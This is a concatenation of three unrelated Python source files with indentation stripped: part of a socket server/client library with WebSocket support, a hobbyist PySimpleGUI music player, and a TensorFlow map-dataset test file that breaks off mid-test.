on_data_recv (:obj:`def`): Holds the function you specified to use, can be over written. NOTE: Overwriting this will not overwrite old connection values.
"""
self.on_connection_open = on_connection_open
self.on_connection_close = on_connection_close
self.on_data_recv = on_data_recv
self.HOST = HOST
self.PORT = PORT
self.heart_beats = heart_beats
self.heart_beat_wait = heart_beat_wait
self.connections = {}
self.on_question = on_question
self.running = False
if autorun:
self.Run(connections, daemon, SO_REUSEADDR)
@property
def connection_count(self):
return len(self.connections)
def Run(self, connections=5, daemon=True, SO_REUSEADDR=True):
"""
Will start the server on the specified host, port and listening count.
This setup allows you to shutdown, change, and restart the server.
Parameters
----------
connections (:obj:`int`): How many connections to accept at one time
:rtype: None
"""
self.server = HostServer(self.HOST, self.PORT, connections, SO_REUSEADDR)
self.running = True
self.broker = threading.Thread(target=self.ConnectionBroker, daemon=daemon)
self.broker.start()
def ConnectionBroker(self):
"""
Server background task for accepting connections, you'll not need to use this.
:rtype: None
"""
while self.running:
try:
conn, addr = self.server.accept()
if self.running == False:
conn.close()
return
conID = tokening.CreateToken(12, self.connections)
connector = Socket_Server_Client(conn, addr, conID, self.on_data_recv, on_question=self.on_question, on_close=self.close_connection, Heart_Beat=self.heart_beats, Heart_Beat_Wait=self.heart_beat_wait)
self.connections[conID] = connector
self.on_connection_open(connector)
time.sleep(0.05)
except Exception as e:
self.running = False
raise e
def close_connection(self, connection):
"""
Server background task for clearing connections and notifying the parent file, you'll not need to use this.
:rtype: None
"""
try:
self.on_connection_close(connection)
except:
pass
del self.connections[connection.conID]
def Shutdown(self):
"""
Shutdown the server and close all connections.
:rtype: None
"""
self.running = False
keys = list(self.connections.keys())
for con in keys:
try:
self.connections[con].shutdown()
except:
pass
self.connections = {}
try:
self.server.close()
except:
pass
def CloseConnection(self, conID):
"""
Shortcut to close a certain connection.
Can also be used as Server.connections[conID].shutdown()
:rtype: None
"""
self.connections[conID].shutdown()
class Socket_Server_Client:
def __init__(self, sock, addr, conID, on_data, on_question, on_close, Heart_Beat=True, Heart_Beat_Wait=20):
"""CLIENT for Socket_Server_Host"""
self.socket = sock
self.addr = addr
self.conID = conID
self.on_data = on_data
self.on_close = on_close
self.running = True
self.meta = {}
self.recv_data = b""
self.data_usage = Transfer_Record()
self.on_question = on_question
self.__ask_list__ = {}
self.created = essentials.TimeStamp()
self.heart_beat_wait = Heart_Beat_Wait
threading.Thread(target=self.__detect_client_type__, args=[Heart_Beat]).start()
def __detect_client_type__(self, Heart_Beat):
self.socket.settimeout(1)
while True:
try:
self.recv_data += socket.recv(1)
except:
break
if b"permessage-deflate" in self.recv_data:
self.client_type = WEB_BASED
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
msg = self.recv_data.decode("utf-8")
vals = msg.replace("\r", "").split("\n")
headers = {}
for item in vals:
if item != "" and ":" in item:
headers[item.split(":")[0]] = item.split(": ")[1]
self.web_based_headers = headers
key = headers['Sec-WebSocket-Key']
sha1f = sha1()
sha1f.update(key.encode('utf-8') + GUID.encode('utf-8'))
response_key = base64.b64encode(sha1f.digest()).decode('utf-8')
websocket_answer = (
'HTTP/1.1 101 Switching Protocols',
'Upgrade: websocket',
'Connection: Upgrade',
'Sec-WebSocket-Accept: {key}\r\n\r\n',
)
response = '\r\n'.join(websocket_answer).format(key=response_key)
self.socket.send(response.encode('utf-8'))
else:
self.client_type = PYTHONIC
threading.Thread(target=self.__data_rev__, daemon=True).start()
if Heart_Beat == True and self.client_type == PYTHONIC:
self.socket.settimeout(None)
threading.Thread(target=self.__heart_beat__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.heart_beat_wait)
def shutdown(self):
"""
Shuts down this connection and removes any place it is still stored. Completes the on_close event.
:rtype: None
"""
try:
self.on_close(self)
except:
pass
self.running = False
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
if self.running == False:
raise ConnectionResetError("No Connection")
if self.client_type == PYTHONIC:
try:
SocketUpload(self.socket, data)
except:
self.shutdown()
elif self.client_type == WEB_BASED:
try:
SocketUpload_WebBased(self.socket, data)
except:
self.shutdown()
def ask(self, data, timeout=5):
if self.client_type == WEB_BASED:
print("WARNING: ask for Web Based Clients is not currently supported.")
return False
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
copyed = copy.deepcopy(self.__ask_list__[tok])
del self.__ask_list__[tok]
return copyed['data']
def __data_rev__(self):
"""
Server background task for accepting data and run the on_data event, you'll not need to use this.
:rtype: None
"""
if self.client_type == PYTHONIC:
while self.running:
try:
data, temp = SocketDownload(self.socket, self.recv_data, self.data_usage.recieved)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
threading.Thread(target=self.on_question, args=[Socket_Question(data['data'], self, data['function_ask_question'])], daemon=True).start()
else:
threading.Thread(target=self.on_data, args=[data, self], daemon=True).start()
time.sleep(0.05)
elif self.client_type == WEB_BASED:
while self.running:
msg = b""
conti = True
while conti:
buffer = b""
while b"\n" not in buffer:
try:
buffer += self.socket.recv(1)
except:
conti = False
break
msg += buffer
if msg != b"":
self.data_usage.recieved.add(len(msg))
threading.Thread(target=self.on_data, args=[WebSocket_Decode_Message(msg), self], daemon=True).start()
class Socket_Question(object):
def __init__(self, data, client, tok):
self.data = data
self.questioner = client
self.__answer_token__ = tok
def answer(self, data):
self.questioner.send({"function_ask_response": self.__answer_token__, "data": data})
class Socket_Connector:
def __init__(self, HOST, PORT, on_data_recv, on_question, on_connection_close, Heart_Beat=True, Heart_Beat_Wait=10, legacy=False, legacy_buffer_size=1024):
"""Host your own Socket server to allows connections to this computer.
Parameters
----------
HOST (:obj:`str`): The hosting IP Address for the server.
PORT (:obj:`int`): The port the server is using.
on_data_recv (:obj:`def`): The function to call when you receive data from a connection.
on_question (:obj:`def`): The function to call when you receive Socket_Question from a connection.
on_connection_close (:obj:`def`, optional): The function to call when a connection is closed.
Attributes
----------
running (:obj:`bool`): Is the server still running.
on_connection_close (:obj:`def`): Holds the function you specified to use, can be over written.
on_data_recv (:obj:`def`): Holds the function you specified to use, can be over written.
"""
self.running = True
self.HOST = HOST
self.legacy = legacy
self.legacy_buffer_size = legacy_buffer_size
self.PORT = PORT
self.recv_data = b""
self.__ask_list__ = {}
self.on_question = on_question
self.on_connection_close = on_connection_close
self.socket = ConnectorSocket(HOST, PORT)
self.on_data_recv = on_data_recv
threading.Thread(target=self.__data_rev__, daemon=True).start()
if Heart_Beat == True:
self.heart_beat_wait = Heart_Beat_Wait
threading.Thread(target=self.__heart_beat__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.heart_beat_wait)
def ask(self, data, timeout=5):
if self.legacy:
print("Can't ask questions to legacy connections")
return
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
copyed = copy.deepcopy(self.__ask_list__[tok])
del self.__ask_list__[tok]
return copyed['data']
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
if self.running == False:
raise ConnectionResetError("No Connection")
try:
if self.legacy:
self.socket.sendall(data)
else:
SocketUpload(self.socket, data)
except Exception as e:
print(e)
self.shutdown()
def shutdown(self):
"""
Shuts down this connection. Completes the on_close event.
:rtype: None
"""
self.running = False
self.on_connection_close(self)
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def __data_rev__(self):
"""
Client background task for accepting data and run the on_data event, you'll not need to use this.
:rtype: None
"""
while self.running:
if self.legacy:
self.on_data_recv(self.socket.recv(self.legacy_buffer_size))
else:
try:
data, temp = SocketDownload(self.socket, self.recv_data)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
self.on_question(Socket_Question(data['data'], self, data['function_ask_question']))
else:
self.on_data_recv(data)
|
musicplayer.py
|
'''
musicplayer.py
Copyright (c) 2022 s1gnsgrfu
This software is released under the MIT License.
see https://github.com/s1gnsgrfu/MusicPlayer/blob/master/LICENSE
'''
#pydub,mutagen,pysimplegui,pytaglib
from pydub import AudioSegment
from pydub.utils import mediainfo
from pydub.playback import play
import simpleaudio
from mutagen.easyid3 import EasyID3
import taglib
import PySimpleGUI as sg
from io import BytesIO
from mutagen.id3 import ID3
from PIL import Image
import time
import re
import threading
import os
#import psutil
def plays():
global title,sud,ext,bit,st,th,plpa,art,cover_img,value,artpath
#bit = int(mediainfo(sud)['bit_rate'])
target='\\'
idx=sud[::-1].find(target)
ti=sud[-idx:]
target2='.'
idx2=ti.find(target2)
ext=ti[idx2+1:]
ti1=ti[:idx2]
sau = AudioSegment.from_file(sud, ext)
time1 = sau.duration_seconds
song = taglib.File(sud)
title=str(song.tags['TITLE'])
#title=dic['TITLE']
title=title.strip('[\'').strip('\']')
art=str(song.tags['ARTIST'])
art=art.strip('[\'').strip('\']')
tags = ID3(sud)
apic = tags.get("APIC:")
#アートワーク
cover_img = Image.open(BytesIO(apic.data))
cover_img.save(f"C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\art\\{art}_{title}.jpg")
artpath="C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\art\\{art}_{title}.jpg"
#image_elem.update(source=f"art\\{art}_{title}.jpg")
#window['arrt'].update(f"art\\{art}_{title}.jpg")
#window.find_element('arrt').Update(source=f"art\\{art}_{title}.jpg")
#window.find_element('arrt').Update(f"art\\{art}_{title}.jpg")
#cover_img.show()
#print('Title:',title,'\tFormat:',ext,'\ttime:',round(time1),'sec','\tBitrate:',bit//1000,'Kbps\n')
print('Title:',title,'\tFormat:',ext,'\ttime:',round(time1),'sec\n')
simpleaudio.stop_all()
plpa='icon\\play.png'
thread5.start()
th=1
return
def pl():
global sud,ext,bit,plf,a,th,plpa
plpa='icon\\pause.png'
#sound=AudioSegment.from_file(sud,format=ext,bitrate=bit,stop=True)
sound=AudioSegment.from_file(sud,format=ext,stop=True)
a=play(sound)
st=2
plf=th=1
return
#再生中st==2
def stop():
simpleaudio.stop_all()
def info():
#print('Title:',ti1,'\tFormat:',ext,'\ttime:',round(time1),'sec','\tBitrate:',bit//1000,'Kbps','\tsamplerate:',slp,'Hz\n')
print('Title:',title,'\tFormat:',ext,'\ttime:',round(time),'sec')
#print('Title:',data[0],'\tFormat:',data[1],'\ttime:',round(data[2]),'sec','\tBitrate:',data[3]//1000,'Kbps\n')
return
def playing():
global plf
while True:
print('\rPlaying ',end='')
if plf==1:
p=0
break
time.sleep(1)
print('\rPlaying. ',end='')
if plf==1:
p=0
break
time.sleep(1)
print('\rPlaying.. ',end='')
if plf==1:
p=0
break
time.sleep(1)
print('\rPlaying...',end='')
if plf==1:
p=0
break
time.sleep(1)
return
def pref():
global mot
print('pref')
mot=[sg.Text('Preference',font=('Segoe UI Variable Small Light',20),pad=((40,0),(20,0)))],
[sg.Text('test01',font=('Segoe UI Variable Small Light',10),pad=((70,0),(50,0))),
sg.Radio('yes','pref1',key='radio01y',pad=((60,0),(50,0))),sg.Radio('no','pref1',key='radio01n',pad=((5,0),(50,0))),
sg.Button('Back',key='prefback',size=(10,1),pad=((700,0),(0,50)))]
window['most'].update('mot')
border=1
plf=st=i=th=c=cc=0
plpa='icon\\play.png'
#gsud=gext=gtitle='f'
a=cover_img=None
art=title=value='None'
#sud = 'music\\Preserved Roses.mp3'
sg.theme('DarkBlack')
#play.stopボタン=bb
#ftm=sg.Frame('',[[sg.Button(image_filename=plpa,key='bb',button_color=('#ffffff', '#000000'),border_width=border)]],size=(680,100),border_width=border)
ftm=sg.Frame('',[[sg.Button('Play',key='bb',button_color=('#ffffff', '#000000'),border_width=1,size=(6,3),pad=((300,0),(20,0)))]],size=(680,100),border_width=border)
#size 680,100
#曲名・アーティスト名表示
ftl=sg.Frame('',[
[sg.Text('no title',key='tit',font=('Segoe UI Variable Small Light',15),pad=((30,0),(20,0)))],
[sg.Text(key='art',font=('Segoe UI Variable Small Light',9),pad=((30,0),(0,0)))]
],size=(200,100),border_width=border)
#size 300,100
#アートワーク表示
fart=sg.Image('',filename='',key='arty',size=(100,100))
ftr=sg.Frame('',[[sg.Button ('b',key='b'),sg.Button ('t',key='cc')]],size=(300,100),border_width=border)
#size 300,100
#主要
defa=sg.Text('def',font=('Segoe UI Variable Small Light',40),pad=((30,0),(20,0)))
fmi=sg.Frame('',[],key='most',size=(1040,620),border_width=border)
'''
image_elem=sg.Image(source=f"art\\{art}_{title}.jpg",key='arrt')
fle=sg.Frame('',[
[image_elem]
],size=(230,620),border_width=border)'''
#left縦長
'''
fri=sg.Frame('',[
sg.Button('-',key='pref',size=(2,1))
],size=(250,620),border_width=border)'''
#エラーでる.行
#fri=sg.Frame('',[],size=(250,620),border_width=border)
fri=sg.Frame('',[[
sg.Button('-',key='pref',size=(2,1))]
],size=(250,620),border_width=border)
'''
layout=[
[fle,fmi,fri],[ftl,ftm,ftr]
]'''
layout=[
[fri,fmi],[fart,ftl,ftm,ftr]
]
window=sg.Window('MusicPlayer',layout,resizable=True)
'''
thread1=threading.Thread(target=plays)
thread2=threading.Thread(target=info)
thread3=threading.Thread(target=playing)
thread5=threading.Thread(target=pl)'''
#print(song.tags)
#{'ALBUM': ['white forces'], 'ARTIST': ['fripSide'], 'COMMENT': ['Uploaded by Mashin'], 'DATE': ['2016'], 'GENRE': ['Anime'], 'TITLE': ['white forces'], 'TRACKNUMBER': ['1/4']}
while True:
event,values=window.read()
thread1=threading.Thread(target=plays)
thread2=threading.Thread(target=info)
thread3=threading.Thread(target=playing)
thread5=threading.Thread(target=pl)
if event is None:
print('exit')
break
#print(st)
if event=='bb':
if st==1:pass
else:
#thread4.start()
#i=0
if cc==0:
window['bb'].update('Pause')
#sud = 'music\\Preserved Roses.mp3'
sud = "C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\music\\white forces.mp3"
cc+=1
print(cc)
elif cc==1:
stop()
cc+=1
print(cc)
elif cc==2:
window['bb'].update('Play')
#sud = 'music\\white forces.mp3'
#sud = 'music\\RAGE OF DUST.mp3'
sud = "C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\music\\future gazer.flac"
cc+=1
print(cc)
elif cc==3:
stop()
cc=0
print(cc)
if cc%2==0:
print(cc)
pass
else:
print(cc)
plays()
window['tit'].update(title)
window['art'].update(art)
window['artpath'].update(fart)
if c==0:
window['bb'].update('Pause')
c=1
else:
window['bb'].update('Play')
c=0
#st=1
if event=='b':
print('pushed b')
if event=='cc':
if st==1:pass
else:
#thread4.start()
#i=1
sud = 'music\\white forces.mp3'
plays()
#data=set()
window['tit'].update(title)
if event=='pref':
pref()
if event=='prefback':
window['most'].update('defa')
print('backed')
#else:pass
window.close()
'''
def info():
print('Title:',ti1,'\tFormat:',ext,'\ttime:',round(time1),'sec','\tBitrate:',bit//1000,'Kbps\n')
def playing():
while True:
print('\rPlaying ',end='')
if plf==1:break
time.sleep(1)
print('\rPlaying. ',end='')
if plf==1:break
time.sleep(1)
print('\rPlaying.. ',end='')
if plf==1:break
time.sleep(1)
print('\rPlaying...',end='')
if plf==1:break
time.sleep(1)
#os.system('cls')
thread1=threading.Thread(target=plays)
thread2=threading.Thread(target=info)
thread3=threading.Thread(target=playing)
thread1.start()
thread2.start()
thread2.join()
thread3.start()
thread1.join()
plf=1
thread3.join()
print('\nBye')'''
'''
memo
b==b button
t==t button
bb==play/stop button
パスを変数に入れるときにエスケープシーケンスに注意
進捗
課題
画像(アートワーク)表示
'''
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.kernel_tests import dataset_serialization_test_base
from tensorflow.contrib.data.python.ops import dataset_ops as contrib_dataset_ops
from tensorflow.contrib.data.python.ops import error_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"), num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"),
num_threads=2,
output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message")).prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"),
num_threads=2,
output_buffer_size=2).apply(error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(filenames).map(
io_ops.read_file, num_threads=2, output_buffer_size=2).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = contrib_dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1)).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1)).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.NotFoundError):
sess.run(get_next)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
